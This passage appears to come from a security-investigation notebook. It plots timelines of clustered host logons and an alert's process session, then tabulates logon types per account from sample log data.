# Show timeline of events - all logons + clustered logons
# ref marker indicates the first row of clus_logons (passed as ref_event)
logon_data = {"Clustered": {"data": clus_logons}, "All Logons": {"data": host_logons}}
display_timeline(
data=logon_data,
source_columns=["Account", "LogonType"],
ref_event=clus_logons.iloc[0],
title="All Host Logons",
legend="inline",
)
This shows the timeline of the clustered logon events with the process tree obtained earlier. This allows you to get a sense of which logon was responsible for the process tree session and whether any additional logons (e.g. creating a process as another user) might be associated with the alert timeline.
Note you should use the pan and zoom tools to align the timelines since the data may be over different time ranges.
# Show timeline of events - all events
display_timeline(data=clus_logons,
source_columns=['Account', 'LogonType'],
title='Clustered Host Logons', height=200)
process_tree = pd.read_csv('data/process_tree.csv',
parse_dates=["TimeGenerated"],
infer_datetime_format=True)
display_timeline(data=process_tree,
title='Alert Process Session', height=200)
display_timeline(data=clus_logons, group_by="Account",
source_columns=['Account', 'LogonType'],
title='Clustered Host Logons',
legend="right",
yaxis=True)
# Counts of Logon types by Account
host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()
Account | LogonType | TimeGenerated (count) |
---|---|---|
MSTICAlertsWin1\MSTICAdmin | 4 | 2 |
MSTICAlertsWin1\adm1nistrator | 3 | 1 |
NT AUTHORITY\SYSTEM | 5 | 11 |